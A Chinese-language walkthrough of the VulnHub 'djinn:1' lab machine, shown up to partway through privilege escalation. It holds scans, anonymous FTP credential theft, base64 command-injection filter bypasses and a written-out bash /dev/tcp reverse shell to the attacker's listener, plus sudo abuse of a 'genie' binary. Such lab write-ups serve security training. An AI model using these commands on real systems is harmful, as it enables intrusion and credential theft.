vulnhub靶机 djinn:1
目标为user.txt和root.txt
靶机配置
将靶机下载好后。在VM中选择打开虚拟机,在开启虚拟机之前,网络设置中调整为nat(与攻击机kali一个网段)。
渗透测试
使用nmap进行扫描
└─# nmap -p- -A -T4 192.168.5.130
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-10 10:01 CST
Nmap scan report for 192.168.5.130
Host is up (0.00086s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r-- 1 0 0 11 Oct 20 2019 creds.txt
| -rw-r--r-- 1 0 0 128 Oct 21 2019 game.txt
|_-rw-r--r-- 1 0 0 113 Oct 21 2019 message.txt
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.5.129
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp filtered ssh
1337/tcp open waste?
| fingerprint-strings:
| NULL:
| ____ _____ _
| ___| __ _ _ __ ___ ___ |_ _(_)_ __ ___ ___
| \x20/ _ \x20 | | | | '_ ` _ \x20/ _ \n| |_| | (_| | | | | | | __/ | | | | | | | | | __/
| ____|__,_|_| |_| |_|___| |_| |_|_| |_| |_|___|
| Let's see how good you are with simple maths
| Answer my questions 1000 times and I'll give you your gift.
| '*', 4)
| RPCCheck:
| ____ _____ _
| ___| __ _ _ __ ___ ___ |_ _(_)_ __ ___ ___
| \x20/ _ \x20 | | | | '_ ` _ \x20/ _ \n| |_| | (_| | | | | | | __/ | | | | | | | | | __/
| ____|__,_|_| |_| |_|___| |_| |_|_| |_| |_|___|
| Let's see how good you are with simple maths
| Answer my questions 1000 times and I'll give you your gift.
|_ '+', 9)
7331/tcp open http Werkzeug httpd 0.16.0 (Python 2.7.15+)
|_http-server-header: Werkzeug/0.16.0 Python/2.7.15+
|_http-title: Lost in space
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port1337-TCP:V=7.91%I=7%D=9/10%Time=613ABC9D%P=x86_64-pc-linux-gnu%r(NU
SF:LL,1BC,"\x20\x20____\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20_____\x20_\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\x20/\x20___\|\x20__\
SF:x20_\x20_\x20__\x20___\x20\x20\x20___\x20\x20\|_\x20\x20\x20_\(_\)_\x20
SF:__\x20___\x20\x20\x20___\x20\n\|\x20\|\x20\x20_\x20/\x20_`\x20\|\x20'_\
SF:x20`\x20_\x20\\\x20/\x20_\x20\\\x20\x20\x20\|\x20\|\x20\|\x20\|\x20'_\x
SF:20`\x20_\x20\\\x20/\x20_\x20\\\n\|\x20\|_\|\x20\|\x20\(_\|\x20\|\x20\|\
SF:x20\|\x20\|\x20\|\x20\|\x20\x20__/\x20\x20\x20\|\x20\|\x20\|\x20\|\x20\
SF:|\x20\|\x20\|\x20\|\x20\|\x20\x20__/\n\x20\\____\|\\__,_\|_\|\x20\|_\|\
SF:x20\|_\|\\___\|\x20\x20\x20\|_\|\x20\|_\|_\|\x20\|_\|\x20\|_\|\\___\|\n
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:n\nLet's\x20see\x20how\x20good\x20you\x20are\x20with\x20simple\x20maths
SF:\nAnswer\x20my\x20questions\x201000\x20times\x20and\x20I'll\x20give\x20
SF:you\x20your\x20gift\.\n\(3,\x20'\*',\x204\)\n>\x20")%r(RPCCheck,1BC,"\x
SF:20\x20____\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20_____\x20_\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\x20/\x20___\|\x20__\x20_\x20_\
SF:x20__\x20___\x20\x20\x20___\x20\x20\|_\x20\x20\x20_\(_\)_\x20__\x20___\
SF:x20\x20\x20___\x20\n\|\x20\|\x20\x20_\x20/\x20_`\x20\|\x20'_\x20`\x20_\
SF:x20\\\x20/\x20_\x20\\\x20\x20\x20\|\x20\|\x20\|\x20\|\x20'_\x20`\x20_\x
SF:20\\\x20/\x20_\x20\\\n\|\x20\|_\|\x20\|\x20\(_\|\x20\|\x20\|\x20\|\x20\
SF:|\x20\|\x20\|\x20\x20__/\x20\x20\x20\|\x20\|\x20\|\x20\|\x20\|\x20\|\x2
SF:0\|\x20\|\x20\|\x20\x20__/\n\x20\\____\|\\__,_\|_\|\x20\|_\|\x20\|_\|\\
SF:___\|\x20\x20\x20\|_\|\x20\|_\|_\|\x20\|_\|\x20\|_\|\\___\|\n\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\nLet's\x
SF:20see\x20how\x20good\x20you\x20are\x20with\x20simple\x20maths\nAnswer\x
SF:20my\x20questions\x201000\x20times\x20and\x20I'll\x20give\x20you\x20you
SF:r\x20gift\.\n\(3,\x20'\+',\x209\)\n>\x20");
MAC Address: 00:0C:29:EE:7F:B0 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Unix
TRACEROUTE
HOP RTT ADDRESS
1 0.86 ms 192.168.5.130
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 92.43 seconds
发现21端口开启,并且可以使用用户ftp进行匿名登录,22端口ssh服务被过滤,1337端口的文字显示这是个游戏,回答1000次就能获得礼物。7331是http服务,访问这个服务是要IP:7331
进行访问。
测试21端口
匿名登录后,下载目录里的三个文件
└─# ftp 192.168.5.130
Connected to 192.168.5.130.
220 (vsFTPd 3.0.3)
Name (192.168.5.130:root): ftp
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 11 Oct 20 2019 creds.txt
-rw-r--r-- 1 0 0 128 Oct 21 2019 game.txt
-rw-r--r-- 1 0 0 113 Oct 21 2019 message.txt
226 Directory send OK.
ftp> get creds.txt
local: creds.txt remote: creds.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for creds.txt (11 bytes).
226 Transfer complete.
11 bytes received in 0.00 secs (3.9378 kB/s)
ftp> get game.txt
local: game.txt remote: game.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for game.txt (128 bytes).
226 Transfer complete.
128 bytes received in 0.01 secs (9.0051 kB/s)
ftp> get message.txt
local: message.txt remote: message.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for message.txt (113 bytes).
226 Transfer complete.
113 bytes received in 0.00 secs (707.3818 kB/s)
ftp> exit
221 Goodbye.
查看内容
└─# ls
creds.txt CVE-2018-7600 game.txt message.txt
└─# cat creds.txt
nitu:81299
└─# cat game.txt
oh and I forgot to tell you I've setup a game for you on port 1337. See if you can reach to the
final level and get the prize.
└─# cat message.txt
@nitish81299 I am going on holidays for few days, please take care of all the work.
And don't mess up anything.
获得一个凭据nitu:81299
由于22端口被过滤,先测试1337端口
测试1337端口
└─# telnet 192.168.5.130 1337
Trying 192.168.5.130...
Connected to 192.168.5.130.
Escape character is '^]'.
____ _____ _
/ ___| __ _ _ __ ___ ___ |_ _(_)_ __ ___ ___
| | _ / _` | '_ ` _ \ / _ \ | | | | '_ ` _ \ / _ \
| |_| | (_| | | | | | | __/ | | | | | | | | | __/
\____|\__,_|_| |_| |_|\___| |_| |_|_| |_| |_|\___|
Let's see how good you are with simple maths
Answer my questions 1000 times and I'll give you your gift.
(6, '*', 7)
> 42
(3, '*', 3)
> 9
(9, '/', 1)
> 2
Wrong answer
Connection closed by foreign host.
输入正确结果会继续,错误结果会直接结束
那么编写脚本来进行这1000次尝试
#coding:utf-8
import logging
import telnetlib
import time
import re
def main():
try:
tn = telnetlib.Telnet('192.168.5.130',port=1337)
except:
logging.warning("errr")
time.sleep(0.5)
loop=1
while loop<1002:
data = tn.read_very_eager().decode('ascii')
print(data)
res = re.search('(.*?)\s>',data).group(1)
datas = str(calc(res)).strip()
print(str(loop)+":"+datas)
loop=loop+1
tn.write(datas.encode('ascii')+b"\n")
time.sleep(0.1)
data = tn.read_very_eager().decode('ascii')
return data
def calc(res):
res_str = res.strip('(').strip(")").replace("'","")
muns = res_str.split(',')
munber1 = muns[0].strip()
orperator = muns[1].strip()
munber2 = muns[2].strip()
res = eval(munber1+orperator+munber2)
return res
print(main())
获得gitf 1356, 6784, 3409
>
997:1.4
(2, '+', 2)
>
998:4
(3, '+', 6)
>
999:9
(4, '*', 9)
>
1000:36
(7, '/', 7)
>
1001:1.0
Here is your gift, I hope you know what to do with it:
1356, 6784, 3409
暗语开启ssh端口
knock 192.168.5.130 1356 6784 3409
再次nmap扫描
└─# nmap -p- -A -T4 192.168.5.130
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-10 11:11 CST
Nmap scan report for 192.168.5.130
Host is up (0.00076s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r-- 1 0 0 11 Oct 20 2019 creds.txt
| -rw-r--r-- 1 0 0 128 Oct 21 2019 game.txt
|_-rw-r--r-- 1 0 0 113 Oct 21 2019 message.txt
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.5.129
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 1
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 b8:cb:14:15:05:a0:24:43:d5:8e:6d:bd:97:c0:63:e9 (RSA)
| 256 d5:70:dd:81:62:e4:fe:94:1b:65:bf:77:3a:e1:81:26 (ECDSA)
|_ 256 6a:2a:ba:9c:ba:b2:2e:19:9f:5c:1c:87:74:0a:25:f0 (ED25519)
1337/tcp open waste?
| fingerprint-strings:
| NULL:
| ____ _____ _
| ___| __ _ _ __ ___ ___ |_ _(_)_ __ ___ ___
| \x20/ _ \x20 | | | | '_ ` _ \x20/ _ \n| |_| | (_| | | | | | | __/ | | | | | | | | | __/
| ____|__,_|_| |_| |_|___| |_| |_|_| |_| |_|___|
| Let's see how good you are with simple maths
| Answer my questions 1000 times and I'll give you your gift.
| '/', 6)
| RPCCheck:
| ____ _____ _
| ___| __ _ _ __ ___ ___ |_ _(_)_ __ ___ ___
| \x20/ _ \x20 | | | | '_ ` _ \x20/ _ \n| |_| | (_| | | | | | | __/ | | | | | | | | | __/
| ____|__,_|_| |_| |_|___| |_| |_|_| |_| |_|___|
| Let's see how good you are with simple maths
| Answer my questions 1000 times and I'll give you your gift.
|_ '+', 8)
7331/tcp open http Werkzeug httpd 0.16.0 (Python 2.7.15+)
|_http-server-header: Werkzeug/0.16.0 Python/2.7.15+
|_http-title: Lost in space
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port1337-TCP:V=7.91%I=7%D=9/10%Time=613ACCE4%P=x86_64-pc-linux-gnu%r(NU
SF:LL,1BC,"\x20\x20____\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20_____\x20_\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\x20/\x20___\|\x20__\
SF:x20_\x20_\x20__\x20___\x20\x20\x20___\x20\x20\|_\x20\x20\x20_\(_\)_\x20
SF:__\x20___\x20\x20\x20___\x20\n\|\x20\|\x20\x20_\x20/\x20_`\x20\|\x20'_\
SF:x20`\x20_\x20\\\x20/\x20_\x20\\\x20\x20\x20\|\x20\|\x20\|\x20\|\x20'_\x
SF:20`\x20_\x20\\\x20/\x20_\x20\\\n\|\x20\|_\|\x20\|\x20\(_\|\x20\|\x20\|\
SF:x20\|\x20\|\x20\|\x20\|\x20\x20__/\x20\x20\x20\|\x20\|\x20\|\x20\|\x20\
SF:|\x20\|\x20\|\x20\|\x20\|\x20\x20__/\n\x20\\____\|\\__,_\|_\|\x20\|_\|\
SF:x20\|_\|\\___\|\x20\x20\x20\|_\|\x20\|_\|_\|\x20\|_\|\x20\|_\|\\___\|\n
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:n\nLet's\x20see\x20how\x20good\x20you\x20are\x20with\x20simple\x20maths
SF:\nAnswer\x20my\x20questions\x201000\x20times\x20and\x20I'll\x20give\x20
SF:you\x20your\x20gift\.\n\(9,\x20'/',\x206\)\n>\x20")%r(RPCCheck,1BC,"\x2
SF:0\x20____\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20_____\x20_\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\x20/\x20___\|\x20__\x20_\x20_\x
SF:20__\x20___\x20\x20\x20___\x20\x20\|_\x20\x20\x20_\(_\)_\x20__\x20___\x
SF:20\x20\x20___\x20\n\|\x20\|\x20\x20_\x20/\x20_`\x20\|\x20'_\x20`\x20_\x
SF:20\\\x20/\x20_\x20\\\x20\x20\x20\|\x20\|\x20\|\x20\|\x20'_\x20`\x20_\x2
SF:0\\\x20/\x20_\x20\\\n\|\x20\|_\|\x20\|\x20\(_\|\x20\|\x20\|\x20\|\x20\|
SF:\x20\|\x20\|\x20\x20__/\x20\x20\x20\|\x20\|\x20\|\x20\|\x20\|\x20\|\x20
SF:\|\x20\|\x20\|\x20\x20__/\n\x20\\____\|\\__,_\|_\|\x20\|_\|\x20\|_\|\\_
SF:__\|\x20\x20\x20\|_\|\x20\|_\|_\|\x20\|_\|\x20\|_\|\\___\|\n\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\nLet's\x2
SF:0see\x20how\x20good\x20you\x20are\x20with\x20simple\x20maths\nAnswer\x2
SF:0my\x20questions\x201000\x20times\x20and\x20I'll\x20give\x20you\x20your
SF:\x20gift\.\n\(7,\x20'\+',\x208\)\n>\x20");
MAC Address: 00:0C:29:EE:7F:B0 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.76 ms 192.168.5.130
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 92.77 seconds
22端口成功开启
测试7331端口
由于是http服务,那么进行目录扫描
└─# dirsearch -u "http://192.168.5.130:7331/" -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 130 ⨯
_|. _ _ _ _ _ _|_ v0.4.1
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 220520
Output File: /root/.dirsearch/reports/192.168.5.130/_21-09-10_11-17-08.txt
Error Log: /root/.dirsearch/logs/errors-21-09-10_11-17-08.log
Target: http://192.168.5.130:7331/
[11:17:08] Starting:
[11:17:31] 200 - 385B - /wish
[11:18:09] 200 - 2KB - /genie
Task Completed
进行访问
页面中显示可以实现我们的任何愿望,这里输入whoami
试试
发现返回页面的URL中有结果,则这里有命令执行漏洞
尝试爆出密码
发现被拦截,那么使用burp测试所有特殊字符
发现如下被禁止的特殊字符
; / ? * ^ $
那么尝试使用base64绕过
在本地kali中
└─# echo "cat /etc/passwd"|base64
Y2F0IC9ldGMvcGFzc3dkCg==
在burp中
echo "Y2F0IC9ldGMvcGFzc3dkCg=="|base64 -d|bash
成功执行cat /etc/passwd
反弹shell
在本地进行监听
nc -lvnp 9000
在kali里输入
└─# echo "bash -i &> /dev/tcp/192.168.5.129/9000 0>&1"|base64
YmFzaCAtaSAmPiAvZGV2L3RjcC8xOTIuMTY4LjUuMTI5LzkwMDAgMD4mMQo=
然后在burp中输入
echo "YmFzaCAtaSAmPiAvZGV2L3RjcC8xOTIuMTY4LjUuMTI5LzkwMDAgMD4mMQo="|base64 -d|bash
得到shell
└─# nc -lvnp 9000
listening on [any] 9000 ...
connect to [192.168.5.129] from (UNKNOWN) [192.168.5.130] 42968
bash: cannot set terminal process group (730): Inappropriate ioctl for device
bash: no job control in this shell
www-data@djinn:/opt/80$ whoami
whoami
www-data
切换为pythonshell,这里不切换的话,不能使用su切换用户。
www-data@djinn:/opt/80$ su root
su root
su: must be run from a terminal
python3 -c 'import pty;pty.spawn("/bin/bash")'
在当前目录发现几个文件,使用cat进行查看
www-data@djinn:/opt/80$ cat app.py
cat app.py
import subprocess
from flask import Flask, redirect, render_template, request, url_for
app = Flask(__name__)
app.secret_key = "key"
CREDS = "/home/nitish/.dev/creds.txt"
RCE = ["/", ".", "?", "*", "^", "$", "eval", ";"]
def validate(cmd):
if CREDS in cmd and "cat" not in cmd:
return True
try:
for i in RCE:
for j in cmd:
if i == j:
return False
return True
except Exception:
return False
@app.route("/", methods=["GET"])
def index():
return render_template("main.html")
@app.route("/wish", methods=['POST', "GET"])
def wish():
execute = request.form.get("cmd")
if execute:
if validate(execute):
output = subprocess.Popen(execute, shell=True,
stdout=subprocess.PIPE).stdout.read()
else:
output = "Wrong choice of words"
return redirect(url_for("genie", name=output))
else:
return render_template('wish.html')
@app.route('/genie', methods=['GET', 'POST'])
def genie():
if 'name' in request.args:
page = request.args.get('name')
else:
page = "It's not that hard"
return render_template('genie.html', file=page)
if __name__ == "__main__":
app.run(host='0.0.0.0', debug=True)
这里执行过滤,其中RCE中是被过滤的名单
RCE = ["/", ".", "?", "*", "^", "$", "eval", ";"]
def validate(cmd):
if CREDS in cmd and "cat" not in cmd:
return True
try:
for i in RCE:
for j in cmd:
if i == j:
return False
return True
except Exception:
return False
其中CREDS是一个字符串,使用find进行查找
www-data@djinn:/opt/80$ find / -name *creds* -print 2>&1| grep -v "Permission denied"
<me *creds* -print 2>&1| grep -v "Permission denied"
/home/nitish/.dev/creds.txt
/srv/ftp/creds.txt
找到两处内容
/home/nitish/.dev/creds.txt
/srv/ftp/creds.txt
其中/srv/ftp/creds.txt
之前在ftp中下载了,其中的内容为nitu:81299
用cat查看/home/nitish/.dev/creds.txt
其中的内容
www-data@djinn:/opt/80$ cat /home/nitish/.dev/creds.txt
cat /home/nitish/.dev/creds.txt
nitish:p4ssw0rdStr3r0n9
获得nitish的密码nitish:p4ssw0rdStr3r0n9
使用su进行切换,并获得第一个user.txt
www-data@djinn:/opt/80$ su nitish
su nitish
Password: p4ssw0rdStr3r0n9
nitish@djinn:/opt/80$
nitish@djinn:/opt/80$ cat /home/nitish/user.txt
cat /home/nitish/user.txt
10aay8289ptgguy1pvfa73alzusyyx3c
提权
查看sudo权限
nitish@djinn:/opt/80$ sudo -l
sudo -l
Matching Defaults entries for nitish on djinn:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User nitish may run the following commands on djinn:
(sam) NOPASSWD: /usr/bin/genie
这里genie命令可以使用sam的身份进行运行,而且无需passwd
nitish@djinn:/opt/80$ genie -h
genie -h
usage: genie [-h] [-g] [-p SHELL] [-e EXEC] wish
I know you've came to me bearing wishes in mind. So go ahead make your wishes.
positional arguments:
wish Enter your wish
optional arguments:
-h, --help show this help message and exit
-g, --god pass the wish to god
-p SHELL, --shell SHELL
Gives you shell
-e EXEC, --exec EXEC execute command
经过尝试,这几个参数都不好使用,使用man再次进行查看
nitish@djinn:/opt/80$ man genie
man genie
WARNING: terminal is not fully functional
- (press RETURN)
man(8) genie man page man(8)
NAME
genie - Make a wish
SYNOPSIS
genie [-h] [-g] [-p SHELL] [-e EXEC] wish
DESCRIPTION
genie would complete all your wishes, even the naughty ones.
We all dream of getting those crazy privelege escalations, this will
even help you acheive that.
OPTIONS
wish
This is the wish you want to make .
-g, --god
Sometime we all would like to make a wish to god, this option
let you make wish directly to God;r q to quit)
Manual page genie(8) line 2 (press h for help or q to quit)
Though genie can't gurantee you that your wish will be heard by
God, he's a busy man you know;
-p, --shell
Well who doesn't love those. You can get shell. Ex: -p "/bin/sh"
-e, --exec
Execute command on someone else computer is just too damn fun,
but this comes with some restrictions.
-cmd
You know sometime all you new is a damn CMD, windows I love you.
SEE ALSO
mzfr.github.io
BUGS
There are shit loads of bug in this program, it's all about finding
one.
Manual page genie(8) line 25 (press h for help or q to quit)
发现一个参数 -cmd
进行尝试genie -cmd id
,可以正常运行,exit时会出现机具嘲讽的You are a noob hacker!!
nitish@djinn:/opt/80$ genie -cmd id
genie -cmd id
my man!!
$ id
id
uid=1001(nitish) gid=1001(nitish) groups=1001(nitish)
$ exit
exit
You are a noob hacker!!
使用sam的身份运行id,成功的切换为sam
nitish@djinn:/opt/80$ sudo -u sam genie -cmd id
sudo -u sam genie -cmd id
my man!!
$ id
id
uid=1000(sam) gid=1000(sam) groups=1000(sam),4(adm),24(cdrom),30(dip),46(plugdev),108(lxd),113(lpadmin),114(sambashare)
再次查看sudo权限
sam@djinn:/opt/80$ sudo -l
sudo -l
Matching Defaults entries for sam on djinn:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User sam may run the following commands on djinn:
(root) NOPASSWD: /root/lago
发现lago命令可以用root的身份运行,并且不需要passwd
sam@djinn:/opt/80$ sudo -u root /root/lago
sudo -u root /root/lago
What do you want to do ?
1 - Be naughty
2 - Guess the number
3 - Read some damn files
4 - Work
Enter your choice:
这里尝试后发现没什么可以利用的。
sam@djinn:/opt/80$ sudo -u root /root/lago
sudo -u root /root/lago
What do you want to do ?
1 - Be naughty
2 - Guess the number
3 - Read some damn files
4 - Work
Enter your choice:1
1
Working on it!!
sam@djinn:/opt/80$ sudo -u root /root/lago
sudo -u root /root/lago
What do you want to do ?
1 - Be naughty
2 - Guess the number
3 - Read some damn files
4 - Work
Enter your choice:2
2
Choose a number between 1 to 100:
Enter your number: 52
52
Better Luck next time
sam@djinn:/opt/80$ sudo -u root /root/lago
sudo -u root /root/lago
What do you want to do ?
1 - Be naughty
2 - Guess the number
3 - Read some damn files
4 - Work
Enter your choice:3
3
Enter the full of the file to read: /etc/passwd
/etc/passwd
User root is not allowed to read /etc/passwd
sam@djinn:/opt/80$ sudo -u root /root/lago
sudo -u root /root/lago
What do you want to do ?
1 - Be naughty
2 - Guess the number
3 - Read some damn files
4 - Work
Enter your choice:4
4
work your ass off!!
使用base64进行文件转移,使用base64 app.pyc
,然后将加密的结果复制到本地进行解密,获得原文件。
sam@djinn:/opt/80$ base64 app.pyc
base64 app.pyc
A/MNCgYZzF1jAAAAAAAAAAAIAAAAQAAAAHMIAQAAZAAAZAEAbAAAWgAAZAAAZAIAbAEAbQIAWgIA
bQMAWgMAbQQAWgQAbQUAWgUAbQYAWgYAAWUCAGUHAIMBAFoIAGQDAGUIAF8JAGQEAFoKAGQFAGQG
AGQHAGQIAGQJAGQKAGQLAGQMAGcIAFoLAGQNAIQAAFoMAGUIAGoNAGQFAGQOAGQPAGcBAIMBAWQQ
AIQAAIMBAFoOAGUIAGoNAGQRAGQOAGQSAGQPAGcCAIMBAWQTAIQAAIMBAFoPAGUIAGoNAGQUAGQO
AGQPAGQSAGcCAIMBAWQVAIQAAIMBAFoQAGUHAGQWAGsCAHIEAWUIAGoRAGQXAGQYAGQZAGUSAIMA
AgFuAABkAQBTKBoAAABp/04oBQAAAHQFAAAARmxhc2t0CAAAAHJlZGlyZWN0dA8AAAByZW5k
ZXJfdGVtcGxhdGV0BwAAAHJlcXVlc3R0BwAAAHVybF9mb3J0AwAAAGtleXMbAAAAL2hvbWUvbml0
aXNoLy5kZXYvY3JlZHMudHh0dAEAAAAvdAEAAAAudAEAAAA/dAEAAAAqdAEAAABedAEAAAAkdAQA
AABldmFsdAEAAAA7YwEAAAADAAAABQAAAEMAAABzbwAAAHQAAHwAAGsGAHIcAGQBAHwAAGsHAHIc
AHQBAFN5OgB4LwB0AgBEXScAfQEAeB4AfAAARF0WAH0CAHwBAHwCAGsCAHIzAHQDAFNxMwBXcSYA
V3QBAFNXbhIABHQEAGsKAHJqAAEBAXQDAFNYZAAAUygCAAAATnQDAAAAY2F0KAUAAAB0BQAAAENS
RURTdAQAAABUcnVldAMAAABSQ0V0BQAAAEZhbHNldAkAAABFeGNlcHRpb24oAwAAAHQDAAAAY21k
dAEAAABpdAEAAABqKAAAAAAoAAAAAHMOAAAAL29wdC84MC9hcHAucHl0CAAAAHZhbGlkYXRlDQAA
AHMUAAAAAAEYAQQCAwENAQ0BDAEMAQgBDQF0BwAAAG1ldGhvZHN0AwAAAEdFVGMAAAAAAAAAAAIA
AABDAAAAcwoAAAB0AABkAQCDAQBTKAIAAABOcwkAAABtYWluLmh0bWwoAQAAAFICAAAAKAAAAAAo
AAAAACgAAAAAcw4AAAAvb3B0LzgwL2FwcC5weXQFAAAAaW5kZXgbAAAAcwIAAAAAAnMFAAAAL3dp
c2h0BAAAAFBPU1RjAAAAAAIAAAAGAAAAQwAAAHN4AAAAdAAAagEAagIAZAEAgwEAfQAAfAAAcmoA
dAMAfAAAgwEAck4AdAQAagUAfAAAZAIAdAYAZAMAdAQAagcAgwECaggAagkAgwAAfQEAbgYAZAQA
fQEAdAoAdAsAZAUAZAYAfAEAgwEBgwEAU3QMAGQHAIMBAFNkAABTKAgAAABOUhQAAAB0BQAAAHNo
ZWxsdAYAAABzdGRvdXRzFQAAAFdyb25nIGNob2ljZSBvZiB3b3Jkc3QFAAAAZ2VuaWV0BAAAAG5h
bWVzCQAAAHdpc2guaHRtbCgNAAAAUgMAAAB0BAAAAGZvcm10AwAAAGdldFIXAAAAdAoAAABzdWJw
cm9jZXNzdAUAAABQb3BlblIQAAAAdAQAAABQSVBFUh0AAAB0BAAAAHJlYWRSAQAAAFIEAAAAUgIA
AAAoAgAAAHQHAAAAZXhlY3V0ZXQGAAAAb3V0cHV0KAAAAAAoAAAAAHMOAAAAL29wdC84MC9hcHAu
cHl0BAAAAHdpc2ggAAAAcxAAAAAAAhIBBgEMARIBGAIGAhYCcwYAAAAvZ2VuaWVjAAAAAAEAAAAE
AAAAQwAAAHM6AAAAZAEAdAAAagEAawYAciQAdAAAagEAagIAZAEAgwEAfQAAbgYAZAIAfQAAdAMA
ZAMAZAQAfAAAgwEBUygFAAAATlIfAAAAcxIAAABJdCdzIG5vdCB0aGF0IGhhcmRzCgAAAGdlbmll
Lmh0bWx0BAAAAGZpbGUoBAAAAFIDAAAAdAQAAABhcmdzUiEAAABSAgAAACgBAAAAdAQAAABwYWdl
KAAAAAAoAAAAAHMOAAAAL29wdC84MC9hcHAucHlSHgAAAC8AAABzCAAAAAACDwEVAgYCdAgAAABf
X21haW5fX3QEAAAAaG9zdHMHAAAAMC4wLjAuMHQFAAAAZGVidWcoEwAAAFIiAAAAdAUAAABmbGFz
a1IAAAAAUgEAAABSAgAAAFIDAAAAUgQAAAB0CAAAAF9fbmFtZV9fdAMAAABhcHB0CgAAAHNlY3Jl
dF9rZXlSDwAAAFIRAAAAUhcAAAB0BQAAAHJvdXRlUhoAAABSKAAAAFIeAAAAdAMAAABydW5SEAAA
ACgAAAAAKAAAAAAoAAAAAHMOAAAAL29wdC84MC9hcHAucHl0CAAAADxtb2R1bGU+AQAAAHMWAAAA
DAIoAgwBCQIGAh4DCQ4hBSQPJAoMAQ==
将内容写入到app64
┌──(root💀kali)-[~/cve]
└─# vim app64
进行还原
┌──(root💀kali)-[~/cve]
└─# base64 -d app64 >> app.pyc
使用uncompyle6进行反编译
uncompyle6 -o app.py app.pyc
注意uncompyle6 -o app.py app.pyc 的-o要写在前面,而且目前只支持python2.7~3.8
